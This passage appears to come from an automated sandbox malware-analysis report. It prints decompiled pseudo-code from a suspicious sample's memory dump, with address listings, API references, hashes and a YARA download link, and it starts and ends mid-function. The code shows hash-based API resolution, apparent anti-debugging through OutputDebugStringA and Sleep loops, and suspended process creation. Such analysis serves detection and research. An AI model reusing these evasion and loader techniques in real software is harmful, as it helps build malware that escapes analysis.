									if(_t215 == 0) {
										L91:
										_t216 =  *0x3db1ad; // 0x2661f98
										__eflags = _t216;
										if(_t216 == 0) {
											_push(0x10);
											_t217 = E003B1030();
											_t562 = _t562 + 4;
											__eflags = _t217;
											if(_t217 != 0) {
												_push(0);
												_t218 = E003C9350(_t217);
											} else {
												_t218 = 0;
											}
											 *0x3db1ad = _t218;
										}
										_t537 =  *0x3db1ad; // 0x2661f98
										__eflags = ( *0x3db02a & 0x000000ff) - 1;
										if(( *0x3db02a & 0x000000ff) == 1) {
											_t508 = 0x18f8c844;
											_t534 = _t562 + 0x28;
											E003A6AD0(_t370, _t534, 0x18f8c844, _t534, _t537, 1, 0); // executed
											_push(_t534);
											E003C9520(_t537);
											E003C9510(_t534);
										} else {
											E003C9710(_t537, 0x3db02d,  *0x3db02b & 0x0000ffff);
										}
									} else {
										_t455 =  *0x3db1ad; // 0x2661f98
										_t280 = E003C9660(_t455);
										__eflags = _t280;
										if(_t280 != 0) {
											goto L91;
										}
									}
									_t223 =  *0x3db1b1; // 0x0
									__eflags = _t223;
									if(_t223 == 0) {
										L97:
										_t224 =  *0x3db1b1; // 0x0
										__eflags = _t224;
										if(_t224 == 0) {
											_push(0x10);
											_t225 = E003B1030();
											_t562 = _t562 + 4;
											__eflags = _t225;
											if(_t225 != 0) {
												_push(0);
												_t226 = E003C9350(_t225);
											} else {
												_t226 = 0;
											}
											 *0x3db1b1 = _t226;
										}
										_t534 =  *0x3db1b1; // 0x0
										__eflags = ( *0x3db02a & 0x000000ff) - 1;
										if(( *0x3db02a & 0x000000ff) == 1) {
											_t508 = 0x11041f01;
											E003A6AD0(_t370, _t562 + 0x38, 0x11041f01, _t534, _t537, 1, 1);
											_push(_t562 + 0x38);
											E003C9520(_t534);
											E003C9510(_t562 + 0x38);
											_t233 = E003C9650(_t534);
											__eflags = _t233;
											if(_t233 != 0) {
												_t508 = 0xd3ef7577;
												E003A6AD0(_t370, _t562 + 8, 0xd3ef7577, _t534, _t537, 0, 0);
												E003C9510(_t562);
											}
										} else {
											_t537 =  *0x3db1c4; // 0x3a0000
											__eflags =  *((char*)(E003B3930(_t370, 0, _t534, _t537) + 0xb)) - 0x20;
											_t517 =  ==  ? 0x7e839a6 : 0x93fc68d6;
											_t508 = _t537;
											E003A9090(_t562 + 0x88, _t537,  ==  ? 0x7e839a6 : 0x93fc68d6);
											_push(_t562 + 0x88);
											E003C9520(_t534);
											E003C9510(_t562 + 0x88);
										}
									} else {
										_t453 =  *0x3db1b1; // 0x0
										_t276 = E003C9660(_t453);
										__eflags = _t276;
										if(_t276 != 0) {
											goto L97;
										}
									}
									_t234 =  *((intOrPtr*)(_t549 + 0x2c));
									__eflags = _t234 - 3;
									if(_t234 == 3) {
										__eflags =  *0x3db1cc - 3;
										if( *0x3db1cc == 3) {
											_t235 =  *0x3db1d0; // 0x4c77c8
											_t146 = _t235 + 8; // 0x4c77e0
											E003B8CC0(_t562 + 0x10c,  *_t146);
										}
										_t371 = _t562 + 0x48;
										E003B8810(_t562 + 0x48, 0);
										_t238 = E003B9890(_t371, _t562 + 0x48, _t508, _t534, _t537, _t371, 0x3d9428,  *((intOrPtr*)(_t549 + 0x2c)));
										E003C0220(_t562 + 0x110,  *_t238, 0);
										E003B8CA0(_t371);
										E003A8180(_t537);
									} else {
										__eflags = _t234 - 5;
										if(_t234 != 5) {
											__eflags = _t234 - 6;
											if(__eflags == 0) {
												_t430 = _t562 + 0xa4;
												 *_t430 = 0;
												 *((intOrPtr*)(_t430 + 4)) = 0;
												 *((intOrPtr*)(_t430 + 8)) = 0;
												 *((intOrPtr*)(_t430 + 0xc)) = 0;
												E003B5B60(_t370, _t430, _t534, _t537, __eflags);
												E003A6740(_t562 + 0xa4);
												E003B1350(0x12);
												__eflags =  *(_t562 + 0xa8);
												if( *(_t562 + 0xa8) > 0) {
													_t373 = 0;
													__eflags = 0;
													do {
														_t253 = E003D2B00(_t562 + 0xa8, _t373);
														__eflags =  *((char*)(_t253 + 0x3c));
														if( *((char*)(_t253 + 0x3c)) == 0) {
															E003A2A40(_t562 + 0x50, _t253);
															E003B8CA0(_t562 + 0x50);
														}
														_t373 = _t373 + 1;
														__eflags = _t373 -  *(_t562 + 0xa8);
													} while (_t373 <  *(_t562 + 0xa8));
												}
												E003D2970(_t370, _t562 + 0xa4, _t534);
												_t434 =  *(_t562 + 0xb0);
												__eflags =  *(_t562 + 0xb0);
												if( *(_t562 + 0xb0) != 0) {
													E003A2A20(_t434, 1);
												}
											}
										} else {
											__eflags = _t370;
											if(_t370 == 0) {
												__eflags =  *0x3db1cc - 1;
												if(__eflags <= 0) {
													L106:
													_t438 = _t562 + 0x18;
													 *_t438 = 0;
													 *((intOrPtr*)(_t438 + 4)) = 0;
													 *((intOrPtr*)(_t438 + 8)) = 0;
													 *((intOrPtr*)(_t438 + 0xc)) = 0;
													E003B5B60(_t370, _t438, _t534, _t537, __eflags);
													__eflags = ( *0x3db029 & 0x000000ff) - 1;
													E003A7DB0(_t562 + 0x18, 0 | ( *0x3db029 & 0x000000ff) - 0x00000001 > 0x00000000);
													__eflags =  *0x3db029 & 0x000000ff;
													if(( *0x3db029 & 0x000000ff) != 0) {
														E003B1350(0x12);
														__eflags =  *(_t562 + 0x1c);
														if( *(_t562 + 0x1c) > 0) {
															_t374 = 0;
															__eflags = 0;
															do {
																_t263 = E003D2B00(_t562 + 0x1c, _t374);
																__eflags =  *((char*)(_t263 + 0x3c));
																if( *((char*)(_t263 + 0x3c)) == 0) {
																	E003A2A40(_t562 + 0x10, _t263);
																	E003B8CA0(_t562 + 0x10);
																}
																_t374 = _t374 + 1;
																__eflags = _t374 -  *(_t562 + 0x1c);
															} while (_t374 <  *(_t562 + 0x1c));
														}
													}
													E003D2970(_t370, _t562 + 0x18, _t534);
													_t441 =  *(_t562 + 0x24);
													__eflags =  *(_t562 + 0x24);
													if( *(_t562 + 0x24) != 0) {
														E003A2A20(_t441, 1);
													}
												} else {
													_t266 =  *0x3db1d0; // 0x4c77c8
													_t105 = _t266 + 4; // 0x4c77da
													__eflags = ( *( *_t105) & 0x0000ffff) - 0x2d;
													if(__eflags != 0) {
														goto L106;
													}
												}
											}
										}
									}
									E003C8910(_t562 + 0x130, _t534, _t537);
									E003B8CA0(_t562 + 0x110);
									E003B8CA0(_t562 + 0x108);
									E003B7A70(_t562 + 0x128);
									__eflags = 0;
									return 0;
								} else {
									__eflags =  *0x3db027 & 0x000000ff;
									if(( *0x3db027 & 0x000000ff) == 0) {
										goto L89;
									} else {
										__eflags = _t370;
										if(_t370 != 0) {
											goto L89;
										} else {
											__eflags =  *((char*)(_t549 + 0xb)) - 0x20;
											_t519 =  ==  ? 0x7fe7dfa2 : 0xfd81b916;
											E003A61B0(_t562 + 0x3c,  ==  ? 0x7fe7dfa2 : 0xfd81b916,  *((char*)(_t549 + 0xb)) - 0x20);
											E003B8810(_t562 + 0x18, 0x200);
											_t458 = E003B15C0(0xa1310f65, 0xc4d11e8a);
											__eflags = _t458;
											if(__eflags != 0) {
												_t303 =  *(_t562 + 0x18) >> 1;
												__eflags = _t303;
												_t519 =  *0x3db1c4; // 0x3a0000
												 *_t458(_t519,  *(_t562 + 0x18), _t303);
											}
											_push(0x80);
											_push(0);
											E003CA4E0(_t562 + 0x10, __eflags,  *((intOrPtr*)(_t562 + 0x20)), 1);
											E003CA520(_t562 + 8, _t519, _t562 + 0x1c, 0);
											__eflags =  *((char*)(_t562 + 0x10));
											if( *((char*)(_t562 + 0x10)) != 0) {
												E003CBE30(_t562 + 0xc, _t537);
											}
											__eflags = 0;
											E003B8CA0(_t562);
											_t539 = _t562 + 0x1a0;
											_t552 = _t562 + 0x2c;
											while(1) {
												E003B0B70(_t539, 0, 0x44);
												 *((intOrPtr*)(_t562 + 0x1ac)) = 0x44;
												E003B0B70(_t552, 0, 0x10);
												_t562 = _t562 + 0x18;
												E003B8810(_t562 + 0x4c, 0);
												_t295 = E003B96D0(E003B96D0(E003C0220(_t562 + 0x50,  *((intOrPtr*)(_t562 + 0x40)), 0), 0x20), 0x22);
												_t296 =  *0x3db1d0; // 0x4c77c8
												E003B96D0(E003C0220(_t295,  *_t296, 0), 0x22);
												_t299 = E003B15C0(0xa1310f65, 0x643f303c);
												__eflags = _t299;
												if(_t299 != 0) {
													break;
												}
												E003B8CA0(_t562 + 0x48);
											}
											_push(_t552);
											_push(_t539);
											_push(0);
											_push(0);
											_push(4);
											_push(0);
											_push(0);
											_push(0);
											_push( *((intOrPtr*)(_t562 + 0x68)));
											_push( *((intOrPtr*)(_t562 + 0x60)));
											asm("int3");
											return _t299;
										}
									}
								}
							} else {
								E003C8910(_t562 + 0x130, _t533, _t537);
								E003B8CA0(_t562 + 0x110);
								E003B8CA0(_t562 + 0x108);
								E003B7A70(_t562 + 0x128);
								__eflags = 0;
								return 0;
							}
						} else {
							_push(0x3db1cc);
							_push(0);
							asm("int3");
							return _t186;
						}
					} else {
						asm("int3");
						return _t184;
					}
				} else {
					asm("int3");
					return _t173;
				}
				L145:
			}

0x003a5150
0x003a5151
0x003a5154
0x003a515a
0x003a5163
0x003a5172
0x003a5179
0x003a517f
0x003a5184
0x003a5189
0x003a518e
0x003a5193
0x003a519f
0x003a51a1
0x003a51b7
0x003a51bc
0x003a51bc
0x003a51be
0x003a51c5
0x003a51c5
0x003a51d0
0x003a51dc
0x003a51e4
0x003a51ec
0x003a51f1
0x003a51f2
0x003a51f8
0x00000000
0x00000000
0x00000000
0x00000000
0x003a51fa
0x003a51fa
0x003a51fa
0x003a5200
0x00000000
0x00000000
0x003a5202
0x003a5203
0x003a5209
0x00000000
0x003a520b
0x003a5212
0x003a5212
0x00000000
0x003a5209
0x003a51fa
0x003a5218
0x003a5218
0x003a5218
0x003a521a
0x003a5221
0x003a5221
0x003a522c
0x003a5238
0x003a5240
0x003a5248
0x003a524d
0x003a524e
0x003a5254
0x00000000
0x00000000
0x00000000
0x00000000
0x003a5256
0x003a5256
0x003a5256
0x003a525c
0x00000000
0x00000000
0x003a525e
0x003a525f
0x003a5265
0x00000000
0x003a5267
0x003a526e
0x003a526e
0x00000000
0x003a5265
0x003a5256
0x003a5274
0x003a5274
0x003a5274
0x003a5276
0x003a527d
0x003a527d
0x003a5288
0x003a5294
0x003a529c
0x003a52a4
0x003a52a9
0x003a52aa
0x003a52b0
0x00000000
0x00000000
0x00000000
0x00000000
0x003a52b2
0x003a52b2
0x003a52b2
0x003a52b8
0x00000000
0x00000000
0x003a52ba
0x003a52bb
0x003a52c1
0x00000000
0x003a52c3
0x003a52ca
0x003a52ca
0x00000000
0x003a52c1
0x003a52b2
0x003a52d0
0x003a52d0
0x003a52d0
0x003a52d2
0x003a52d9
0x003a52d9
0x003a52e4
0x003a52f0
0x003a52f8
0x003a5300
0x003a5305
0x003a5306
0x003a530c
0x00000000
0x00000000
0x00000000
0x00000000
0x003a530e
0x003a530e
0x003a530e
0x003a5314
0x00000000
0x00000000
0x003a5316
0x003a5317
0x003a531d
0x00000000
0x003a531f
0x003a5326
0x003a5326
0x00000000
0x003a531d
0x003a530e
0x003a532c
0x003a5333
0x003a5333
0x003a5338
0x003a533d
0x003a5342
0x003a5344
0x003a5350
0x003a5355
0x003a5358
0x003a5efb
0x003a5efb
0x003a5f04
0x003a5f06
0x003a5f08
0x003a5f22
0x003a5f22
0x003a5f2f
0x003a5f34
0x003a5f3b
0x003a5f43
0x003a5f4a
0x003a5f4e
0x003a5f52
0x003a5f52
0x003a5f54
0x003a5f61
0x003a5f67
0x003a5f69
0x003a5f6b
0x00000000
0x00000000
0x003a5f75
0x003a5f7f
0x003a5f8a
0x003a5f8c
0x003a5f97
0x003a5f97
0x003a5fa9
0x003a5fab
0x003a5fad
0x003a5fbd
0x003a5fd0
0x003a5fd0
0x003a5fe1
0x003a5fe4
0x003a5fec
0x003a5fee
0x003a5ff0
0x003a5ffd
0x003a6017
0x003a6017
0x003a5ff0
0x00000000
0x003a5f0a
0x003a5f18
0x003a5f1a
0x003a5f1c
0x00000000
0x00000000
0x00000000
0x00000000
0x003a5f1c
0x00000000
0x003a5f08
0x003a5358
0x003a535e
0x003a535e
0x003a5368
0x003a536f
0x003a5377
0x003a538a
0x003a539b
0x003a539d
0x003a539f
0x003a53aa
0x003a53aa
0x003a53ac
0x003a53ae
0x003a53b0
0x003a53ba
0x003a53cb
0x003a53cd
0x003a53cf
0x003a53cf
0x003a53d4
0x003a53d7
0x003a53d7
0x003a53ba
0x003a53e2
0x003a53f0
0x003a53fc
0x003a540b
0x003a5410
0x003a5412
0x003a541c
0x003a5428
0x003a542d
0x003a542f
0x003a5440
0x003a5451
0x003a5453
0x003a5457
0x003a5459
0x003a5459
0x003a545e
0x003a546f
0x003a5483
0x003a5485
0x003a5487
0x003a5490
0x003a5490
0x003a549c
0x003a549c
0x003a54a5
0x003a54b8
0x003a54bd
0x003a54bf
0x003a54d9
0x003a54ec
0x003a54f1
0x003a54f3
0x003a5506
0x003a550b
0x003a551c
0x003a5525
0x003a5538
0x003a5546
0x003a5552
0x003a5563
0x003a556a
0x003a5576
0x003a5589
0x003a5590
0x003a5599
0x003a5599
0x003a5599
0x003a559c
0x003a54f5
0x003a54f5
0x003a54f5
0x003a55a8
0x003a55b4
0x003a55b9
0x003a55bb
0x003a55c4
0x003a55c4
0x00000000
0x00000000
0x00000000
0x003a54c1
0x003a54c8
0x003a55bd
0x003a55bd
0x003a55bd
0x003a55d2
0x003a55e8
0x003a55f4
0x003a55f9
0x003a5601
0x003a5603
0x003a5606
0x003a5608
0x003a560f
0x003a560f
0x003a5619
0x003a5620
0x003a5622
0x003a562e
0x003a562e
0x003a5630
0x003a5637
0x003a5637
0x003a5637
0x003a5638
0x003a563a
0x00000000
0x00000000
0x003a563c
0x003a563f
0x00000000
0x003a5641
0x003a5641
0x003a5648
0x003a564b
0x00000000
0x003a564d
0x003a560f
0x003a560f
0x003a5619
0x003a5620
0x003a5622
0x003a562e
0x003a562e
0x003a5630
0x00000000
0x003a5630
0x003a560f
0x003a564b
0x00000000
0x003a563f
0x003a564f
0x00000000
0x003a564f
0x003a560f
0x003a5652
0x003a5652
0x003a5656
0x003a569c
0x003a569e
0x003a56ab
0x003a56ad
0x003a56b3
0x003a56ba
0x003a56c0
0x003a56c5
0x003a56c5
0x003a56c8
0x003a56cb
0x003a56ce
0x003a56de
0x003a56e3
0x003a56e8
0x003a56f7
0x003a5700
0x003a5705
0x003a5707
0x003a5724
0x003a5729
0x003a572f
0x003a572f
0x003a5738
0x003a573d
0x003a573d
0x003a573f
0x003a574b
0x003a574d
0x00000000
0x00000000
0x003a5754
0x003a5759
0x003a575a
0x003a575d
0x00000000
0x00000000
0x00000000
0x003a575d
0x003a575f
0x003a5766
0x003a5770
0x003a5783
0x003a578a
0x003a579b
0x003a579b
0x003a5709
0x003a5709
0x003a570e
0x003a5714
0x003a5714
0x003a571d
0x003a571d
0x003a57a6
0x003a57a6
0x003a56ce
0x003a56ba
0x003a56ad
0x003a57b2
0x003a57b5
0x003a5b3c
0x003a5b3c
0x003a5b41
0x003a5b43
0x003a5b54
0x003a5b54
0x003a5b59
0x003a5b5b
0x003a5e33
0x003a5e35
0x003a5e3a
0x003a5e3d
0x003a5e3f
0x003a5e47
0x003a5e49
0x003a5e41
0x003a5e41
0x003a5e41
0x003a5e4e
0x003a5e4e
0x003a5b61
0x003a5b6e
0x003a5b71
0x003a5e0b
0x003a5e10
0x003a5e1a
0x003a5e21
0x003a5e22
0x003a5e29
0x003a5b77
0x003a5b86
0x003a5b86
0x003a5b45
0x003a5b45
0x003a5b4b
0x003a5b50
0x003a5b52
0x00000000
0x00000000
0x003a5b52
0x003a5b92
0x003a5b97
0x003a5b99
0x003a5baa
0x003a5baa
0x003a5baf
0x003a5bb1
0x003a5eb0
0x003a5eb2
0x003a5eb7
0x003a5eba
0x003a5ebc
0x003a5ec4
0x003a5ec6
0x003a5ebe
0x003a5ebe
0x003a5ebe
0x003a5ecb
0x003a5ecb
0x003a5bb7
0x003a5bc4
0x003a5bc7
0x003a5e62
0x003a5e68
0x003a5e73
0x003a5e74
0x003a5e7d
0x003a5e84
0x003a5e89
0x003a5e8b
0x003a5e93
0x003a5e9e
0x003a5ea6
0x003a5ea6
0x003a5bcd
0x003a5bcf
0x003a5be8
0x003a5bf1
0x003a5bf5
0x003a5bf7
0x003a5c05
0x003a5c06
0x003a5c12
0x003a5c12
0x003a5b9b
0x003a5b9b
0x003a5ba1
0x003a5ba6
0x003a5ba8
0x00000000
0x00000000
0x003a5ba8
0x003a5c1e
0x003a5c21
0x003a5c24
0x003a5d87
0x003a5d8e
0x003a5ed5
0x003a5eda
0x003a5ee4
0x003a5ee4
0x003a5d94
0x003a5d9c
0x003a5daa
0x003a5dbd
0x003a5dc4
0x003a5dc9
0x003a5c2a
0x003a5c2a
0x003a5c2d
0x003a5cf0
0x003a5cf3
0x003a5cfb
0x003a5d02
0x003a5d04
0x003a5d07
0x003a5d0a
0x003a5d0d
0x003a5d1b
0x003a5d25
0x003a5d2a
0x003a5d32
0x003a5d34
0x003a5d34
0x003a5d36
0x003a5d3e
0x003a5d43
0x003a5d47
0x003a5d4f
0x003a5d58
0x003a5d58
0x003a5d5d
0x003a5d5e
0x003a5d5e
0x003a5d36
0x003a5d6e
0x003a5d73
0x003a5d7a
0x003a5d7c
0x003a5d80
0x003a5d80
0x003a5d7c
0x003a5c33
0x003a5c33
0x003a5c35
0x003a5c3b
0x003a5c42
0x003a5c58
0x003a5c5a
0x003a5c5e
0x003a5c60
0x003a5c63
0x003a5c66
0x003a5c69
0x003a5c77
0x003a5c81
0x003a5c8d
0x003a5c8f
0x003a5c96
0x003a5c9b
0x003a5ca0
0x003a5ca2
0x003a5ca2
0x003a5ca4
0x003a5ca9
0x003a5cae
0x003a5cb2
0x003a5cba
0x003a5cc3
0x003a5cc3
0x003a5cc8
0x003a5cc9
0x003a5cc9
0x003a5ca4
0x003a5ca0
0x003a5cd3
0x003a5cd8
0x003a5cdc
0x003a5cde
0x003a5ce6
0x003a5ce6
0x003a5c44
0x003a5c44
0x003a5c49
0x003a5c4f
0x003a5c52
0x00000000
0x00000000
0x003a5c52
0x003a5c42
0x003a5c35
0x003a5c2d
0x003a5dd5
0x003a5de1
0x003a5ded
0x003a5df9
0x003a5dfe
0x003a5e0a
0x003a57bb
0x003a57c2
0x003a57c4
0x00000000
0x003a57ca
0x003a57ca
0x003a57cc
0x00000000
0x003a57d2
0x003a57dc
0x003a57e4
0x003a57e7
0x003a57f5
0x003a5809
0x003a580b
0x003a580d
0x003a5813
0x003a5813
0x003a581a
0x003a5821
0x003a5821
0x003a5823
0x003a5828
0x003a5834
0x003a5844
0x003a5849
0x003a584e
0x003a5854
0x003a5854
0x003a5859
0x003a585e
0x003a5863
0x003a586a
0x003a586e
0x003a5873
0x003a5878
0x003a5888
0x003a588d
0x003a5896
0x003a58b7
0x003a58be
0x003a58d0
0x003a58df
0x003a58e4
0x003a58e6
0x00000000
0x00000000
0x003a5996
0x003a5996
0x003a58ec
0x003a58ed
0x003a58ee
0x003a58ef
0x003a58f0
0x003a58f2
0x003a58f3
0x003a58f4
0x003a58f5
0x003a58f9
0x003a58fd
0x003a58fe
0x003a58fe
0x003a57cc
0x003a57c4
0x003a5658
0x003a565f
0x003a566b
0x003a5677
0x003a5683
0x003a5688
0x003a5694
0x003a5694
0x003a5431
0x003a5431
0x003a5436
0x003a5437
0x003a5438
0x003a5438
0x003a5414
0x003a5414
0x003a5415
0x003a5415
0x003a517b
0x003a517b
0x003a517c
0x003a517c
0x00000000

APIs

OutputDebugStringA.KERNEL32(?,00000014,00000050,00000028,00000064,A1310F65,755128FE,00000001), ref: 003A51DC
Sleep.KERNEL32(0000000A), ref: 003A51E4
OutputDebugStringA.KERNEL32(?), ref: 003A5212
OutputDebugStringA.KERNEL32(?,00000014,00000050), ref: 003A5238
Sleep.KERNEL32(0000000A), ref: 003A5240
OutputDebugStringA.KERNEL32(?), ref: 003A526E
OutputDebugStringA.KERNEL32(?,00000014,00000050), ref: 003A5294
Sleep.KERNEL32(0000000A), ref: 003A529C
OutputDebugStringA.KERNEL32(?), ref: 003A52CA
OutputDebugStringA.KERNEL32(?,00000014,00000050), ref: 003A52F0
Sleep.KERNEL32(0000000A), ref: 003A52F8

Strings

D, xrefs: 003A5878
@, xrefs: 003A5F8C
, xrefs: 003A57DC

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID: DebugOutputString$Sleep
String ID: $@$D
API String ID: 3789842296-3631221151
Opcode ID: 00f7b9b68a79759b9b67f6ca7ce6b692bde0cb00360f51181021bd2ad246bc7e
Instruction ID: e3b29477ef275d8f2769ec8ee25a0e9ce94a8b786cd490a012f0ebde51884f0a
Opcode Fuzzy Hash: 00f7b9b68a79759b9b67f6ca7ce6b692bde0cb00360f51181021bd2ad246bc7e
Instruction Fuzzy Hash: CF62D4302047449BD727EB20DC56FEFB7A9EF86304F41482DF6869A192EF719905CB62

Uniqueness

Uniqueness Score: -1.00%

Function 003B3930, Relevance: 6.8, APIs: 4, Instructions: 834
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E003B3930(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _v32;
				intOrPtr _v36;
				char _v44;
				void* _v60;
				void* _v72;
				char _v76;
				char _v84;
				void* _v88;
				char _v92;
				void* _v96;
				long _v100;
				long _v104;
				long _v108;
				char _v112;
				void* _v116;
				char _v120;
				void* _v154;
				struct _SYSTEM_INFO _v156;
				signed int _v160;
				void* _v164;
				char _v168;
				void* _v172;
				char _v176;
				char _v180;
				void* _v184;
				char _v188;
				void* _v196;
				intOrPtr _v424;
				signed char _v428;
				signed char _v432;
				char _v496;
				void* _v500;
				void* _v504;
				char _v520;
				void* _v524;
				intOrPtr _t163;
				intOrPtr _t174;
				char _t175;
				intOrPtr* _t183;
				void* _t187;
				void* _t197;
				signed int _t201;
				char _t212;
				intOrPtr _t219;
				intOrPtr _t223;
				void* _t229;
				int _t234;
				intOrPtr _t241;
				void* _t244;
				void* _t247;
				void* _t255;
				void* _t263;
				void* _t264;
				int _t275;
				void* _t279;
				void* _t282;
				void* _t283;
				void* _t286;
				void* _t289;
				void* _t292;
				void* _t295;
				void* _t298;
				void* _t306;
				intOrPtr _t308;
				void* _t311;
				void* _t313;
				void* _t314;
				intOrPtr _t315;
				void* _t316;
				signed char _t322;
				intOrPtr* _t344;
				void** _t346;
				void* _t354;
				void* _t359;
				void* _t360;
				void* _t362;
				void* _t364;
				intOrPtr _t366;
				void* _t367;
				void* _t368;
				void* _t374;
				void* _t375;
				void* _t377;
				signed char _t378;
				void* _t381;
				intOrPtr _t382;
				intOrPtr _t383;
				void* _t384;
				void* _t386;
				void* _t387;
				void* _t388;
				void* _t389;
				intOrPtr _t392;
				intOrPtr _t394;
				void* _t395;
				intOrPtr _t398;
				intOrPtr _t400;
				intOrPtr* _t402;
				void* _t403;
				void* _t406;
				void* _t407;
				void* _t408;
				void* _t409;
				void* _t410;
				void* _t411;
				intOrPtr* _t413;
				signed char* _t416;
				intOrPtr* _t417;
				void* _t420;
				void* _t425;
				signed int _t429;
				void* _t432;
				void* _t433;
				void* _t434;
				signed int _t439;
				signed int _t442;
				void* _t444;
				intOrPtr* _t445;

				_t439 = _t442;
				_push(__esi);
				_push(__edi);
				_push(__ebx);
				_t444 = (_t442 & 0xfffffff0) - 0x1b4;
				_t313 = __ecx;
				_t163 =  *0x3db1f0; // 0x26859a0
				if(_t163 == 0x9ccb2c38) {
					_push(0x30);
					_t163 = E003B1030();
					_t444 = _t444 + 4;
					 *0x3db1f0 = _t163;
				}
				if( *((char*)(_t163 + 0xb)) == 0 || _t313 != 0) {
					_t416 =  &_v432;
					E003B0B70(_t416, 0, 0x11c);
					_t445 = _t444 + 0xc;
					_t377 =  *0x3db1f4; // 0x2661568
					_v432 = 0x11c;
					if(_t377 == 0xc139578) {
						 *0x3db1f4 = 0;
						_t314 = 0;
						goto L11;
					} else {
						if(_t377 == 0) {
							_t314 = 0;
							goto L11;
						} else {
							_t314 = 0;
							do {
								_t375 = _t314;
								_t311 = _t375;
								while( *((intOrPtr*)(_t311 + _t377 + 8)) != 0x13e99f60) {
									_t375 = _t375 + 1;
									_t311 = _t311 + 0x18;
									if(_t375 < 0x10) {
										continue;
									} else {
										goto L10;
									}
									goto L236;
								}
								_t308 =  *((intOrPtr*)(_t311 + _t377 + 0x14));
								if(_t308 != 0) {
									L14:
									if(_t308 == 0) {
										L16:
										_t417 =  *0x3db1f0; // 0x26859a0
										_t378 = _v432;
										_t322 = _v428;
										 *((intOrPtr*)(_t417 + 4)) = _v424;
										_t428 = (_t378 & 0x000000ff) << 4;
										 *(_t417 + 9) = _t322;
										 *(_t417 + 8) = _t378;
										 *((char*)(_t417 + 0xa)) = _v160 & 0x0000ffff;
										_t380 =  !=  ? 1 : _t314;
										 *((char*)(_t417 + 0xc)) =  !=  ? 1 : _t314;
										_t381 =  *0x3db1f4; // 0x2661568
										_v32 = _t314;
										 *_t417 = (_t322 & 0x000000ff) + ((_t378 & 0x000000ff) << 4) - 0x50;
										if(_t381 == 0xc139578) {
											 *0x3db1f4 = 0;
											goto L22;
										} else {
											if(_t381 == 0) {
												L22:
												_push(0xa1310f65);
												_t428 = E003B7564(0xa1310f65);
												if(_t428 == 0) {
													if(E003B6C50(0xa1310f65) != 0) {
														_push(0xa1310f65);
														_t428 = E003B7564(0xa1310f65);
													}
												}
												if(_t428 != 0) {
													_t445 = _t445 + 0xfffffff8;
													_t413 = E003B67C8(_t428, 0x16ea6870);
													goto L25;
												}
											} else {
												do {
													_t374 = _t314;
													_t306 = _t374;
													while( *((intOrPtr*)(_t306 + _t381 + 8)) != 0x16ea6870) {
														_t374 = _t374 + 1;
														_t306 = _t306 + 0x18;
														if(_t374 < 0x10) {
															continue;
														} else {
															goto L21;
														}
														goto L27;
													}
													_t413 =  *((intOrPtr*)(_t306 + _t381 + 0x14));
													if(_t413 != 0) {
														L25:
														if(_t413 != 0) {
															 *_t413(0xffffffff,  &_v44);
														}
														goto L27;
													} else {
														goto L22;
													}
													goto L236;
													L21:
													asm("o16 nop [eax+eax]");
													_t22 = _t381 + 0x180; // 0x26890a8
													_t381 =  *_t22;
												} while (_t381 != 0);
												goto L22;
											}
										}
										L27:
										_t174 =  *0x3db1f0; // 0x26859a0
										if(_v36 == 0) {
											 *((char*)(_t174 + 0xb)) = 0x20;
										} else {
											 *((char*)(_t174 + 0xb)) = 0x40;
										}
										_t175 = E003B47B0(_t314, _t417, _t428);
										_t382 =  *0x3db1f0; // 0x26859a0
										 *((char*)(_t382 + 0x28)) = _t175;
										if( *((intOrPtr*)(E003B3930(_t314, 0, _t417, _t428))) >= 0x10) {
											asm("movups xmm0, [0x3da130]");
											asm("movsd xmm1, [0x3da140]");
											asm("movups [esp+0x130], xmm0");
											asm("movsd [esp+0x140], xmm1");
											_t418 =  &_v120;
											_push(0);
											E003C9350( &_v120);
											_t429 = _t314;
											do {
												E003C9670( &_v120, E003C9650( &_v120) + 4);
												_t315 =  *((intOrPtr*)(_t445 + 0x130 + _t429 * 4));
												_t183 = E003C9640(_t418, E003C9650(_t418) + 0xfffffffc);
												_t429 = 1 + _t429;
												 *_t183 = _t315;
											} while (_t429 < 6);
											_push(0);
											_t314 = 0;
											E003CC550(0,  &_v160, _t429, _t439, _t418, 0x80000002);
											E003C9510(_t418);
											E003CC580( &_v172, _t382,  &_v84, 0x1cd1a4f3);
											_push(_v92);
											_t187 = E003CC790( &_v180, _t382);
											_t419 = _t187;
											E003C0B10( &_v84);
											if(_t187 != 0) {
												E003CC580( &_v168, _t382,  &(_v156.lpMinimumApplicationAddress), 0xc28d248b);
												_push(_v156.dwOemId);
												_t419 = E003CC790( &_v176, _t382);
												E003C0B10( &(_v156.lpMinimumApplicationAddress));
												E003CC580( &_v180, _t382,  &(_v156.dwPageSize), 0xead58213);
												_push(_v160);
												_t432 = E003CC790( &_v188, _t382);
												E003C0B10( &_v164);
												if(_t419 != 0) {
													if(_t419 == 5) {
														if(_t432 == 0) {
															E003B8CA0( &_v164);
															if(_v168 != 0) {
																_t406 = _v172;
																if(_t406 == 0 || _t406 == 0xffffffff) {
																	_t283 = 1;
																} else {
																	_t283 = 0;
																}
																if(_t283 == 0) {
																	E003CBF00(_t406);
																}
															}
															_v172 = 0;
															_t197 = 3;
															goto L64;
														} else {
															if(_t432 == 1) {
																E003B8CA0( &_v164);
																if(_v168 != 0) {
																	_t407 = _v172;
																	if(_t407 == 0 || _t407 == 0xffffffff) {
																		_t286 = 1;
																	} else {
																		_t286 = 0;
																	}
																	if(_t286 == 0) {
																		E003CBF00(_t407);
																	}
																}
																_v172 = 0;
																_t197 = 4;
																goto L64;
															} else {
																goto L56;
															}
														}
														goto L236;
													} else {
														if(_t419 != 2 || _t432 != 1) {
															goto L56;
														} else {
															E003B8CA0( &_v164);
															if(_v168 != 0) {
																_t409 = _v172;
																if(_t409 == 0 || _t409 == 0xffffffff) {
																	_t292 = 1;
																} else {
																	_t292 = 0;
																}
																if(_t292 == 0) {
																	E003CBF00(_t409);
																}
															}
															_v172 = 0;
															_t197 = 5;
														}
													}
												} else {
													if(_t432 != 0) {
														L56:
														E003B8CA0( &_v164);
														if(_v168 != 0) {
															_t408 = _v172;
															if(_t408 == 0 || _t408 == 0xffffffff) {
																_t289 = 1;
															} else {
																_t289 = _t314;
															}
															if(_t289 == 0) {
																E003CBF00(_t408);
															}
														}
														_v172 = 0;
														_t197 = _t314;
													} else {
														E003B8CA0( &_v164);
														if(_v168 != 0) {
															_t410 = _v172;
